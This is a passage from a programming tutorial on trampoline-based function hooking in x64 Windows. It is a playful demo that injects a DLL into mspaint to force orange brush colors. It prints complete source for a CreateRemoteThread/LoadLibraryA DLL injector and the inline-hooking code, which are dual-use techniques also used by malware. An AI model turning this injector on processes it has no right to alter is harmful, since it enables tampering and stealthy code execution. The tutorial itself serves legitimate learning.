<span class="o">*</span><span class="n">trampolinePtr</span> <span class="o">=</span> <span class="n">hookMemory</span><span class="p">;</span>
<span class="c1">//create the relay function</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span> <span class="o">+</span> <span class="n">trampolineSize</span><span class="p">;</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunc</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//install the hook</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">int32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">TargetFunc</span><span class="p">(</span><span class="n">argc</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">TargetFunc</span><span class="p">,</span> <span class="n">HookPayload</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">**</span><span class="p">)</span><span class="o">&</span><span class="n">TargetFuncTrampoline</span><span class="p">);</span>
<span class="n">TargetFunc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
</details></div>
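<p>As a quick recap of the two jump encodings that the code above leans on, here is a minimal, platform-independent sketch that only writes the bytes into a buffer. The names EncodeRelJump32 and EncodeAbsJump64 are hypothetical and are not part of the example source. The choice of r10 as the scratch register is an assumption, picked because a mov/jmp pair through r8-r15 comes out to the 13 bytes mentioned in the BuildTrampoline comment. The sketch also assumes a little-endian host, which is true on x64.</p>

```cpp
#include <cstdint>
#include <cstring>

// Encode a 5-byte relative jump (E9 rel32) that lives at address `from` and lands on `to`.
// The rel32 operand is measured from the END of the jump instruction, i.e. from + 5.
// Returns false when the target is further away than a signed 32 bit offset can reach.
bool EncodeRelJump32(uint64_t from, uint64_t to, uint8_t* out /* 5 bytes */)
{
    const int64_t delta = int64_t(to) - int64_t(from + 5);
    if (delta < INT32_MIN || delta > INT32_MAX)
    {
        return false;
    }
    const int32_t rel = int32_t(delta);
    out[0] = 0xE9;
    std::memcpy(out + 1, &rel, sizeof(rel));
    return true;
}

// Encode a 13-byte absolute jump: mov r10, imm64 ; jmp r10
// (r10 is an assumption here, see the note above)
void EncodeAbsJump64(uint64_t to, uint8_t* out /* 13 bytes */)
{
    const uint8_t bytes[13] = {
        0x49, 0xBA, 0, 0, 0, 0, 0, 0, 0, 0, // mov r10, imm64 (imm64 patched in below)
        0x41, 0xFF, 0xE2                    // jmp r10
    };
    std::memcpy(out, bytes, sizeof(bytes));
    std::memcpy(out + 2, &to, sizeof(to));
}
```

<p>The range check in EncodeRelJump32 is the reason the relay function has to be allocated near the hooked function: a 5-byte jump can only reach targets within roughly 2GB of where it is written, while the 13-byte form can go anywhere.</p>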
<h2 id="example-4-using-a-trampoline-to-hook-a-running-program">Example 4: Using a Trampoline to Hook a Running Program</h2>
<p>Like Po at the end of Kung Fu Panda, it’s time to put all our newfound skills to use and fulfill our destiny of becoming the dragon warrior.</p>
<p>The last example is going to use a trampoline to force mspaint to always use the color orange, no matter what color the user tries to select. This was shown in the gif at the start of the article, but it’s been a long time since then, so here that gif is again:</p>
<div align="center">
<img src="/images/post_images/2020-11-13/orangepaint.gif" />
<br /><br />
</div>
<p>Mercifully for us, we don’t need to go on an RVA fishing trip this time, because the function we want to hook is exported from a DLL. We’re going to install a hook into gdiplus.dll’s GdipSetSolidFillColor() function. Finding out that this was the right function to hook was pretty much the same process as the last mspaint example: lots of trial and error with breakpoints in x64dbg. A reverse engineer I am not.</p>
<p>So, here’s the plan:</p>
<ol>
<li>Write a hook payload function that intercepts calls to GdipSetSolidFillColor and replaces the incoming function arguments with the color orange.</li>
<li>Put that payload in a DLL, along with all the hooking logic required to make it happen</li>
<li>Inject that DLL into a running instance of mspaint</li>
<li>Make beautiful artwork with the best color ever.</li>
</ol>
<p>We’ve already exhaustively walked through a code example that used the same hooking logic that we need to use here. Rather than do that again, let’s focus on what’s different this time. Looking up GdipSetSolidFillColor() gives us this function signature:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">GpStatus</span> <span class="n">WINGDIPAPI</span> <span class="n">GdipSetSolidFillColor</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpSolidFill</span> <span class="o">*</span><span class="n">brush</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">color</span><span class="p">)</span></code></pre></figure>
<p>Recall that the ARGB type is a uint32 with each byte representing a color channel. This means that all our payload needs to do to make things orange is set some bits and pass the new ARGB value to the trampoline:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpStatus</span><span class="p">(</span><span class="o">*</span><span class="n">GdipSetSolidFillColorTrampoline</span><span class="p">)(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpSolidFill</span><span class="o">*</span> <span class="n">brush</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">color</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpStatus</span> <span class="nf">GdipSetSolidFillColorPayload</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpSolidFill</span><span class="o">*</span> <span class="n">brush</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">color</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">orange</span> <span class="o">=</span> <span class="mh">0xffff7700</span><span class="p">;</span>
<span class="k">return</span> <span class="n">GdipSetSolidFillColorTrampoline</span><span class="p">(</span><span class="n">brush</span><span class="p">,</span> <span class="n">orange</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
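<p>If the 0xffff7700 constant looks a bit magic, here is a small sketch of how the four channels pack into that value. It uses a local ARGB alias as a stand-in for Gdiplus::ARGB so that it compiles without gdiplus.h, and MakeARGB and the channel getters are hypothetical helper names, not part of GDI+ or of the example source.</p>

```cpp
#include <cstdint>

// Stand-in for Gdiplus::ARGB (a 32 bit unsigned value), so this builds without gdiplus.h
using ARGB = uint32_t;

// Pack four 8 bit channels into one value: alpha in the top byte, blue in the bottom byte
constexpr ARGB MakeARGB(uint8_t a, uint8_t r, uint8_t g, uint8_t b)
{
    return (ARGB(a) << 24) | (ARGB(r) << 16) | (ARGB(g) << 8) | ARGB(b);
}

// Pull a single channel back out of a packed value
constexpr uint8_t AlphaOf(ARGB c) { return uint8_t(c >> 24); }
constexpr uint8_t RedOf(ARGB c)   { return uint8_t(c >> 16); }
constexpr uint8_t GreenOf(ARGB c) { return uint8_t(c >> 8); }
constexpr uint8_t BlueOf(ARGB c)  { return uint8_t(c); }

// The orange used by the payload: fully opaque, full red, some green, no blue
static_assert(MakeARGB(0xff, 0xff, 0x77, 0x00) == 0xffff7700u, "opaque orange");
```

<p>Swapping in a different color for the payload is just a matter of changing those four bytes.</p>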
<p>This isn’t going to be enough to make ALL the possible painting tools spit out orange all the time. The paint can tool, spray paint brushes, etc. will still use the selected color. Our dll will just make most brushes always paint orange, which is good enough for me. It’ll also totally mess with the output of some brushes and make them operate weirdly too, which is fun in its own way.</p>
<p>Here’s a gif demonstrating some of the tools <em>not</em> painting orange, despite our dll being injected into paint:</p>
<div align="center">
<img src="/images/post_images/2020-11-13/orangepaint_problems.gif" />
<br /><br />
</div>
<p>The hooking logic that we include in the DLL is going to be similar to the trampoline code we wrote for Example 3. The main difference is how we get a pointer to the function we want to hook.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">gdiPlusModule</span> <span class="o">=</span> <span class="n">FindModuleInProcess</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span> <span class="p">(</span><span class="s">"gdiplus.dll"</span><span class="p">));</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">localHookFunc4</span> <span class="o">=</span> <span class="n">GetProcAddress</span><span class="p">(</span><span class="n">gdiPlusModule</span><span class="p">,</span> <span class="p">(</span><span class="s">"GdipSetSolidFillColor"</span><span class="p">));</span>
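<span class="n">InstallHook</span><span class="p">(</span><span class="n">localHookFunc4</span><span class="p">,</span> <span class="n">GdipSetSolidFillColorPayload</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">**</span><span class="p">)</span><span class="o">&</span><span class="n">GdipSetSolidFillColorTrampoline</span><span class="p">);</span>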
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The FindModuleInProcess() function called above is similar to the GetBaseModuleForProcess() function that we used in a previous example, except that it can look for any loaded module by string name. The function is a bit long, so rather than paste it here, I’ve included it in the complete source for this example. The program used to inject this dll into paint is the same as the one we used before, but it’s also included below.</p>
<p>It took a while to get here, but we’re finally done with Example 4! Go celebrate by making beautiful orange artwork!</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full Source For DLL Injector Program (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="c1">//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process</span>
<span class="c1">// usage: Injector_LoadLibrary <process name> <path to dll> </span>
<span class="cp">#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h
</span>
<span class="kt">void</span> <span class="nf">printHelp</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Injector_LoadLibrary</span><span class="se">\n</span><span class="s">Usage: Injector_LoadLibrary <process name> <path to dll></span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">createRemoteThread</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">processID</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">dllPath</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">handle</span> <span class="o">=</span> <span class="n">OpenProcess</span><span class="p">(</span>
<span class="n">PROCESS_QUERY_INFORMATION</span> <span class="o">|</span> <span class="c1">//Needed to get a process' token</span>
<span class="n">PROCESS_CREATE_THREAD</span> <span class="o">|</span> <span class="c1">//for obvious reasons</span>
<span class="n">PROCESS_VM_OPERATION</span> <span class="o">|</span> <span class="c1">//required to perform operations on address space of process (like WriteProcessMemory)</span>
<span class="n">PROCESS_VM_WRITE</span><span class="p">,</span> <span class="c1">//required for WriteProcessMemory</span>
<span class="n">FALSE</span><span class="p">,</span> <span class="c1">//don't inherit handle</span>
<span class="n">processID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">handle</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not open process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//once the process is open, we need to write the name of our dll to that process' memory</span>
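<span class="kt">size_t</span> <span class="n">dllPathLen</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">dllPath</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">//+1 so the null terminator gets written to the remote process too</span>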
<span class="kt">void</span><span class="o">*</span> <span class="n">dllPathRemote</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//let the system decide where to allocate the memory</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="c1">//actually commit the virtual memory</span>
<span class="n">PAGE_READWRITE</span><span class="p">);</span> <span class="c1">//mem access for committed page</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">dllPathRemote</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not allocate %zu bytes in process with pid: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">writeSucceeded</span> <span class="o">=</span> <span class="n">WriteProcessMemory</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="n">dllPathRemote</span><span class="p">,</span>
<span class="n">dllPath</span><span class="p">,</span>
<span class="n">dllPathLen</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">writeSucceeded</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not write %zu bytes to process with pid %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dllPathLen</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now get address of LoadLibraryA function inside Kernel32.dll</span>
<span class="c1">//TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"</span>
<span class="n">PTHREAD_START_ROUTINE</span> <span class="n">loadLibraryFunc</span> <span class="o">=</span> <span class="p">(</span><span class="n">PTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">GetModuleHandle</span><span class="p">(</span><span class="n">TEXT</span><span class="p">(</span><span class="s">"Kernel32.dll"</span><span class="p">)),</span> <span class="s">"LoadLibraryA"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">loadLibraryFunc</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not find LoadLibraryA function inside kernel32.dll</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now create a thread in remote process that loads our target dll using LoadLibraryA</span>
<span class="n">HANDLE</span> <span class="n">remoteThread</span> <span class="o">=</span> <span class="n">CreateRemoteThread</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//default thread security</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//stack size for thread</span>
<span class="n">loadLibraryFunc</span><span class="p">,</span> <span class="c1">//pointer to start of thread function (for us, LoadLibraryA)</span>
<span class="n">dllPathRemote</span><span class="p">,</span> <span class="c1">//pointer to variable being passed to thread function</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//0 means the thread runs immediately after creation</span>
<span class="nb">NULL</span><span class="p">);</span> <span class="c1">//we don't care about getting back the thread identifier</span>
<span class="k">if</span> <span class="p">(</span><span class="n">remoteThread</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not create remote thread.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="s">"Success! remote thread started in process %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// Wait for the remote thread to terminate</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">,</span> <span class="n">INFINITE</span><span class="p">);</span>
<span class="c1">//once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down</span>
<span class="n">VirtualFreeEx</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">dllPathRemote</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">handle</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="nf">findPidByName</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">h</span><span class="p">;</span>
<span class="n">PROCESSENTRY32</span> <span class="n">singleProcess</span><span class="p">;</span>
<span class="n">h</span> <span class="o">=</span> <span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span> <span class="c1">//takes a snapshot of specified processes</span>
<span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span> <span class="c1">//get all processes</span>
<span class="mi">0</span><span class="p">);</span> <span class="c1">//ignored for SNAPPROCESS</span>
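<span class="n">singleProcess</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESSENTRY32</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">Process32First</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">))</span> <span class="c1">//fill in the first entry so the loop below never reads uninitialized data</span>
<span class="p">{</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>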
<span class="k">do</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">singleProcess</span><span class="p">.</span><span class="n">szExeFile</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">singleProcess</span><span class="p">.</span><span class="n">th32ProcessID</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"PID Found: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="n">pid</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">Process32Next</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">));</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">)</span>
<span class="p">{</span>
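<span class="n">printHelp</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">//bail out instead of reading argv entries that may not exist</span>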
<span class="p">}</span>
<span class="n">createRemoteThread</span><span class="p">(</span><span class="n">findPidByName</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]),</span> <span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full Source For Example 4 (click to expand)</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#include <cstdlib>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include <vector>
#include <Windows.h>
#include <gdiplus.h>
#include <Psapi.h>
#pragma comment (lib, "Gdiplus.lib")
</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpStatus</span><span class="p">(</span><span class="o">*</span><span class="n">GdipSetSolidFillColorTrampoline</span><span class="p">)(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpSolidFill</span><span class="o">*</span> <span class="n">brush</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">color</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpStatus</span> <span class="nf">GdipSetSolidFillColorPayload</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">GpSolidFill</span><span class="o">*</span> <span class="n">brush</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">color</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">orange</span> <span class="o">=</span> <span class="mh">0xffff7700</span><span class="p">;</span>
<span class="k">return</span> <span class="n">GdipSetSolidFillColorTrampoline</span><span class="p">(</span><span class="n">brush</span><span class="p">,</span> <span class="n">orange</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
<span class="c1">//clamp the search window to what a 32 bit relative jump can reach, and to the valid application address range</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="n">max</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
